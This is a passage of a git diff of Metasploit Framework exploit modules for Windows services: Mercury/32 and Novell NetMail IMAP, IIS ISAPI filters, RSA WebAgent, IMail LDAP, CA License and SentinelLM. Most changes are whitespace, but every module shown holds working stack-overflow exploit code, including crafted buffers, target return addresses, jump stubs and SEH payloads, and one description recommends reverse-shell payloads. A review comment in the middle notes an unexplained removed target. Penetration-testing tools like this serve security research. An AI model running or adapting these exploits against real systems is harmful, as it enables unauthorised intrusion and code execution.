English', { 'Ret' => 0x75022ac4 } ], [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], @@ -55,7 +53,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Mar 6 2007', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( + [ + Opt::RPORT(143) + ], self.class) end def check @@ -78,16 +79,16 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A001 LOGIN " + (" " * 1008) + "{#{num}}\n" sock.put(sploit) sock.get_once - + sploit << rand_text_alpha_upper(255) sock.put(sploit) - sock.get_once + sock.get_once sploit << make_nops(5295 - payload.encoded.length) - sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) - sploit << make_nops(2) + [target.ret].pack('V') + sploit << payload.encoded + Rex::Arch::X86.jmp_short(6) + sploit << make_nops(2) + [target.ret].pack('V') sploit << [0xe8, -1200].pack('CV') + rand_text_alpha_upper(750) - + print_status("Trying target #{target.name}...") sock.put(sploit) 
diff --git a/modules/exploits/windows/imap/mercury_rename.rb b/modules/exploits/windows/imap/mercury_rename.rb index d3cd6ceb4a..5356d03c55 100644 --- a/modules/exploits/windows/imap/mercury_rename.rb +++ b/modules/exploits/windows/imap/mercury_rename.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow vulnerability in the + This module exploits a stack overflow vulnerability in the Mercury/32 v.4.01a IMAP service. }, 'Author' => [ 'MC' ], @@ -34,7 +32,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '12508'], [ 'BID', '11775'], [ 'NSS', '15867'], - ], 'Privileged' => true, 'DefaultOptions' => @@ -46,10 +43,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 500, 'BadChars' => "\x00\x0a\x0d\x20", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP4 English', { 'Ret' => 0x7846107b }], ['Windows XP Pro SP0 English', { 'Ret' => 0x77dc0df0 }], @@ -73,10 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote connect_login sploit = "a001 RENAME " + rand_text_alpha_upper(260) - sploit << [target.ret].pack('V') + payload.encoded + sploit << [target.ret].pack('V') + payload.encoded sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/imap/novell_netmail_append.rb b/modules/exploits/windows/imap/novell_netmail_append.rb index 856e89f163..de6ba3fbff 100644 
--- a/modules/exploits/windows/imap/novell_netmail_append.rb +++ b/modules/exploits/windows/imap/novell_netmail_append.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND - verb. By sending an overly long string, an attacker can overwrite the - buffer and control program execution. + This module exploits a stack overflow in Novell's Netmail 3.52 IMAP APPEND + verb. By sending an overly long string, an attacker can overwrite the + buffer and control program execution. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -48,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], ], 
@@ -56,22 +54,22 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 23 2006')) end - + def exploit - sploit = "a002 APPEND " + "saved-messages (\Seen) " + sploit = "a002 APPEND " + "saved-messages (\Seen) " sploit << rand_text_english(1358) + payload.encoded + "\xeb\x06" - sploit << rand_text_english(2) + [target.ret].pack('V') + sploit << rand_text_english(2) + [target.ret].pack('V') sploit << [0xe9, -585].pack('CV') + rand_text_english(150) - info = connect_login - + info = connect_login + if (info == true) print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/imap/novell_netmail_auth.rb b/modules/exploits/windows/imap/novell_netmail_auth.rb index c4344ea56f..a6b8662b37 100644 --- a/modules/exploits/windows/imap/novell_netmail_auth.rb +++ b/modules/exploits/windows/imap/novell_netmail_auth.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -17,13 +17,13 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE + This module exploits a stack overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE GSSAPI command. By sending an overly long string, an attacker can overwrite the buffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp - or windows/shell_reverse_tcp allows for the most reliable results. + or windows/shell_reverse_tcp allows for the most reliable results. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -37,23 +37,23 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 850, 'BadChars' => "\x00\x20\x2c\x3a\x40", 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 } ], ], 'DisclosureDate' => 'Jan 7 2007', 'DefaultTarget' => 0)) - register_options( [ Opt::RPORT(143) ], self.class ) + register_options( [ Opt::RPORT(143) ], self.class ) end def exploit @@ -66,9 +66,9 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A001 AUTHENTICATE GSSAPI\r\n" sploit << rand_text_alpha_upper(1258) + payload.encoded + "\xeb\x06" - sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') + sploit << rand_text_alpha_upper(2) + [target.ret].pack('V') sploit << make_nops(8) + jmp + rand_text_alpha_upper(700) - + print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n" + "A002 LOGOUT\r\n") 
diff --git a/modules/exploits/windows/imap/novell_netmail_status.rb b/modules/exploits/windows/imap/novell_netmail_status.rb index 0eb6181b23..218a04f7c9 100644 --- a/modules/exploits/windows/imap/novell_netmail_status.rb +++ b/modules/exploits/windows/imap/novell_netmail_status.rb @@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS - verb. By sending an overly long string, an attacker can overwrite the - buffer and control program execution. + This module exploits a stack overflow in Novell's Netmail 3.52 IMAP STATUS + verb. By sending an overly long string, an attacker can overwrite the + buffer and control program execution. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 
@@ -47,29 +45,29 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], + ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 18 2005')) end - - def exploit - sploit = "a002 STATUS " + rand_text_english(1602) + payload.encoded - sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') - sploit << [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox" - info = connect_login - + def exploit + sploit = "a002 STATUS " + rand_text_english(1602) + payload.encoded + sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') + sploit << [0xe8, -485].pack('CV') + rand_text_english(150) + " inbox" + + info = connect_login + if (info == true) print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n") else - print_status("Not falling through with exploit") + print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/imap/novell_netmail_subscribe.rb b/modules/exploits/windows/imap/novell_netmail_subscribe.rb index 17807fe12c..f62ea45fd8 100644 --- a/modules/exploits/windows/imap/novell_netmail_subscribe.rb +++ b/modules/exploits/windows/imap/novell_netmail_subscribe.rb 
@@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Imap def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE + This module exploits a stack overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE verb. By sending an overly long string, an attacker can overwrite the buffer and control program execution. }, @@ -48,7 +46,7 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP4 English', { 'Ret' => 0x75022ac4 }], ], @@ -56,12 +54,12 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 23 2006')) end - + def exploit - sploit = "a002 SUBSCRIBE #" + rand_text_english(1602) + payload.encoded - sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') - sploit << [0xe8, -485].pack('CV') + rand_text_english(150) - + sploit = "a002 SUBSCRIBE #" + rand_text_english(1602) + payload.encoded + sploit << "\xeb\x06" + rand_text_english(2) + [target.ret].pack('V') + sploit << [0xe8, -485].pack('CV') + rand_text_english(150) + info = connect_login if (info == true) @@ -70,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("Not falling through with exploit") end - + handler disconnect end diff --git a/modules/exploits/windows/isapi/fp30reg_chunked.rb b/modules/exploits/windows/isapi/fp30reg_chunked.rb index db8e839311..7199b1c442 100644 
--- a/modules/exploits/windows/isapi/fp30reg_chunked.rb +++ b/modules/exploits/windows/isapi/fp30reg_chunked.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow', 'Description' => %q{ - This is an exploit for the chunked encoding buffer overflow + This is an exploit for the chunked encoding buffer overflow described in MS03-051 and originally reported by Brett Moore. This particular modules works against versions of Windows 2000 between SP0 and SP3. Service Pack 4 fixes the issue. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 
@@ -48,48 +45,48 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 SP0-SP3', { 'Ret' => 0x6c38a4d0 }], # from mfc42.dll ['Windows 2000 07/22/02', { 'Ret' => 0x67d44eb1 }], # from fp30reg.dll 07/22/2002 - ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 + ['Windows 2000 10/06/99', { 'Ret' => 0x67d4665d }], # from fp30reg.dll 10/06/1999 ], 'DisclosureDate' => 'Nov 11 2003', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), - ], self.class) + + register_options( + [ + OptString.new('URL', [ true, "The path to fp30reg.dll", "/_vti_bin/_vti_aut/fp30reg.dll" ]), + ], self.class) end def exploit - + print_status("Creating overflow request for fp30reg.dll...") - + pat = rand_text_alphanumeric(0xdead) pat[128, 4] = [target.ret].pack('V') pat[264, 4] = [target.ret].pack('V') # sub eax,0xfffffeff; jmp eax pat[160, 7] = "\x2d\xff\xfe\xff\xff" + "\xff\xe0" - + pat[280, 512] = make_nops(512) pat[792, payload.encoded.length] = payload.encoded - + 0.upto(15) do |i| - + if (i % 3 == 0) print_status("Refreshing the remote dllhost.exe process...") - + res = send_request_raw({ 'uri' => datastore['URL'] }, -1) - + if (res and res.body =~ /specified module could not be found/) print_status("The server states that #{datastore['URL']} does not exist.\n") return - end + end end print_status("Trying to exploit fp30reg.dll (request #{i} of 15)") @@ -110,17 +107,17 @@ class Metasploit3 < Msf::Exploit::Remote end handler - + sleep(1) end end - + def check print_status("Requesting the vulnerable ISAPI path...") r = send_request_raw({ 'uri' => datastore['URL'] - }, -1) - + }, -1) + if (r and r.code == 501) return Exploit::CheckCode::Detected end diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index a3c3c1d40b..9df5c3605f 100644 
--- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb @@ -3,26 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS Phone Book Service Overflow', 'Description' => %q{ - This is an exploit for the Phone Book Service /pbserver/pbserver.dll + This is an exploit for the Phone Book Service /pbserver/pbserver.dll described in MS00-094. By sending an overly long URL argument for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1. @@ -58,17 +56,17 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Dec 04 2000', 'DefaultTarget' => 0)) - register_options( - [ - OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]), - ], self.class) + register_options( + [ + OptString.new('URL', [ true, "The path to pbserver.dll", "/pbserver/pbserver.dll" ]), + ], self.class) end def check print_status("Requesting the vulnerable ISAPI path...") res = send_request_raw({ 'uri' => datastore['URL'] - }, 5) + }, 5) if (res and res.code == 400) return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/isapi/nsiislog_post.rb b/modules/exploits/windows/isapi/nsiislog_post.rb index 3f24c1decf..a6088aa34d 100644 --- a/modules/exploits/windows/isapi/nsiislog_post.rb +++ b/modules/exploits/windows/isapi/nsiislog_post.rb 
@@ -3,33 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking - include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::BruteTargets include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow', 'Description' => %q{ - This exploits a buffer overflow found in the nsiislog.dll + This exploits a buffer overflow found in the nsiislog.dll ISAPI filter that comes with Windows Media Server. This module will also work against the 'patched' MS03-019 version. This vulnerability was addressed by MS03-022. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -41,7 +37,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'BID', '8035'], [ 'MSB', 'MS03-022'], [ 'URL', 'http://archives.neohapsis.com/archives/vulnwatch/2003-q2/0120.html'], - ], 'Privileged' => false, 'Payload' => @@ -52,14 +47,14 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # SEH offsets by version (Windows 2000) # 4.1.0.3917 = 9992 # 4.1.0.3920 = 9992 - # 4.1.0.3927 = 9992 + # 4.1.0.3927 = 9992 # 4.1.0.3931 = 14092 - + ['Brute Force', { }], ['Windows 2000 -MS03-019', { 'Rets' => [ 9988, 0x40f01333 ] }], ['Windows 2000 +MS03-019', { 'Rets' => [ 14088, 0x40f01353 ] }], 
@@ -67,24 +62,24 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Jun 25 2003', 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]), - ], self.class) + + register_options( + [ + OptString.new('URL', [ true, "The path to nsiislog.dll", "/scripts/nsiislog.dll" ]), + ], self.class) end - + def check res = send_request_raw({ 'uri' => datastore['URL'] }, -1) - + if (res and res.body =~ /NetShow ISAPI/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end - + def exploit_target(target) # Create a buffer greater than max SEH offset (16384) @@ -105,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) sleep(1) - + handler disconnect end diff --git a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb index e96b80513f..6f39490109 100644 --- a/modules/exploits/windows/isapi/rsa_webagent_redirect.rb +++ b/modules/exploits/windows/isapi/rsa_webagent_redirect.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,16 +18,16 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft IIS ISAPI RSA WebAgent Redirect Overflow', 'Description' => %q{ This module exploits a stack overflow in the SecurID Web Agent for IIS. This ISAPI filter runs in-process with inetinfo.exe, any attempt to exploit this flaw will result in the termination and potential restart of the IIS service. - + }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ # Version-specific return addresses ['RSA WebAgent 5.2', { 'Rets' => [ 996, 0x1001e694 ] }], @@ -67,36 +67,36 @@ class Metasploit3 < Msf::Exploit::Remote ['RSA WebAgent 5.3 on Windows 2003 English SP0', { 'Rets' => [ 992, 0x7ffc0638 ] }], ], 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('URL', [ true, "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]), - ], self.class) + + register_options( + [ + OptString.new('URL', [ true, "The path to IISWebAgentIF.dll", "/WebID/IISWebAgentIF.dll" ]), + ], self.class) end - + def check r = send_request_raw({ 'uri' => datastore['URL'], 'query' => 'GetPic?image=msf' }, -1) - - if (r and r.body and r.body =~ /RSA Web Access Authentication/) + + if (r and r.body and r.body =~ /RSA Web Access Authentication/) return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end - + def exploit pat = rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK seh = generate_seh_payload(target['Rets'][1]) pat[target['Rets'][0]-4, seh.length] = seh - + r = send_request_raw({ 'uri' => datastore['URL'], 'query' => 'Redirect?url=' + pat }, 5) - + handler disconnect end diff --git a/modules/exploits/windows/ldap/imail_thc.rb b/modules/exploits/windows/ldap/imail_thc.rb index ea2f4f3ca6..4a14a8b1b2 100644 --- a/modules/exploits/windows/ldap/imail_thc.rb +++ b/modules/exploits/windows/ldap/imail_thc.rb 
@@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'IMail LDAP Service Buffer Overflow', 'Description' => %q{ - This exploits a buffer overflow in the LDAP service that is + This exploits a buffer overflow in the LDAP service that is part of the IMail product. This module was tested against version 7.10 and 8.5, both running on Windows 2000. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 
@@ -36,48 +33,45 @@ class Metasploit3 < Msf::Exploit::Remote [ 'OSVDB', '3984'], [ 'BID', '9682'], [ 'URL', 'http://secunia.com/advisories/10880/'], - ], 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0a\x0d\x20", - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ["Windows 2000 English", { 'Ret' => 0x75023386 }], ["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }], ], 'DisclosureDate' => 'Feb 17 2004', 'DefaultTarget' => 0)) - - register_options( - [ - Opt::RPORT(389) - ], self.class) + + register_options( + [ + Opt::RPORT(389) + ], self.class) end def exploit connect - + buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20" buf << "\xcc" * 5000 - + # Universal exploit, targets 6.x, 7.x, and 8.x at once ;) - # Thanks for johnny cyberpunk for 6/7 vs 8 diffs - + # Thanks for johnny cyberpunk for 6/7 vs 8 diffs + buf[77, 4] = "\xeb\x06" buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x buf[85, 4] = "\xeb\x06" buf[89, 4] = [target.ret].pack('V') # 8.x buf[93, payload.encoded.length] = payload.encoded - + sock.put(buf) - + handler disconnect end diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 0d2be06afa..21f9f32626 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -3,13 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' class Metasploit3 < Msf::Exploit::Remote 
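Review bot: The `Targets` array in this hunk loses the `["Windows 2000 English", { 'Ret' => 0x75023386 }]` entry while everything else in the commit is whitespace cleanup, and nothing on the page explains the removal. That is a behavioural change hidden in a formatting commit: `DefaultTarget` stays at `0`, so the module's default target now resolves to a different entry than before. Either split the removal into its own commit or leave a comment above the remaining entry, e.g. `# 'Windows 2000 English' target removed — [reason placeholder]`, so the next maintainer does not restore it by accident. The surrounding `initialize` body starts outside this hunk.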
@@ -18,11 +17,11 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Computer Associates License Client GETCONFIG Overflow', 'Description' => %q{ - This module exploits an vulnerability in the CA License Client - service. This exploit will only work if your IP address can be + This module exploits an vulnerability in the CA License Client + service. This exploit will only work if your IP address can be resolved from the target system point of view. This can be accomplished on a local network by running the 'nmbd' service that comes with Samba. If you are running this exploit from @@ -74,13 +73,13 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Mar 02 2005')) - register_options( - [ - Opt::RPORT(10203), - OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]), - ], self.class) + register_options( + [ + Opt::RPORT(10203), + OptPort.new('SRVPORT', [ true, "Fake CA License Server Port", 10202 ]), + ], self.class) end - + #def check # It is possible to check, but due to a software bug, checking prevents exploitation #end @@ -112,14 +111,14 @@ class Metasploit3 < Msf::Exploit::Remote req = session.recvfrom(2000)[0] next if not req next if req.empty? - + if (req =~ /OS\<([^\>]+)/) print_status("Target reports OS: #{$1}") end # exploits two different versions at once >:-) # 144 -> return address of esi points to string middle - # 196 -> return address of edi points to string beginning + # 196 -> return address of edi points to string beginning # 148 -> avoid exception by patching with writable address # 928 -> seh handler (not useful under XP SP2) buff = rand_text_alphanumeric(900) diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index 429d43061f..dde0d21d08 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb 
+++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -3,13 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' class Metasploit3 < Msf::Exploit::Remote @@ -18,10 +17,10 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Computer Associates License Server GETCONFIG Overflow', 'Description' => %q{ - This module exploits an vulnerability in the CA License Server + This module exploits an vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten. }, @@ -67,12 +66,12 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'Mar 02 2005')) - register_options( - [ - Opt::RPORT(10202), - ], self.class) + register_options( + [ + Opt::RPORT(10202), + ], self.class) end - + def check connect banner = sock.get_once @@ -95,7 +94,7 @@ class Metasploit3 < Msf::Exploit::Remote # exploits two different versions at once >:-) # 144 -> return address of esi points to string middle - # 196 -> return address of edi points to string beginning + # 196 -> return address of edi points to string beginning # 148 -> avoid exception by patching with writable address # 928 -> seh handler (not useful under XP SP2) buff = rand_text_alphanumeric(900) @@ -108,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit = "A0 GETCONFIG SELF #{buff}<EOM>" sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/license/sentinel_lm7_udp.rb b/modules/exploits/windows/license/sentinel_lm7_udp.rb index bf847c4d4b..c67f081dcb 100644 
--- a/modules/exploits/windows/license/sentinel_lm7_udp.rb +++ b/modules/exploits/windows/license/sentinel_lm7_udp.rb @@ -3,31 +3,28 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Udp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'SentinelLM UDP Buffer Overflow', 'Description' => %q{ - This module exploits a simple stack overflow in the Sentinel + This module exploits a simple stack overflow in the Sentinel License Manager. The SentinelLM service is installed with a wide selection of products and seems particular popular with academic products. If the wrong target value is selected, the service will crash and not restart. - }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, @@ -37,7 +34,6 @@ class Metasploit3 < Msf::Exploit::Remote [ 'CVE', '2005-0353'], [ 'OSVDB', '14605'], [ 'BID', '12742'], - ], 'Privileged' => true, 'DefaultOptions' => @@ -49,10 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 800, 'BadChars' => "\x00\x20", 'StackAdjustment' => -3500, - }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['SentinelLM 7.2.0.0 Windows NT 4.0 SP4/SP5/SP6', { 'Ret' => 0x77681799 }], # ws2help.dll ['SentinelLM 7.2.0.0 Windows 2000 English', { 'Ret' => 0x75022ac4 }], # ws2help.dll 
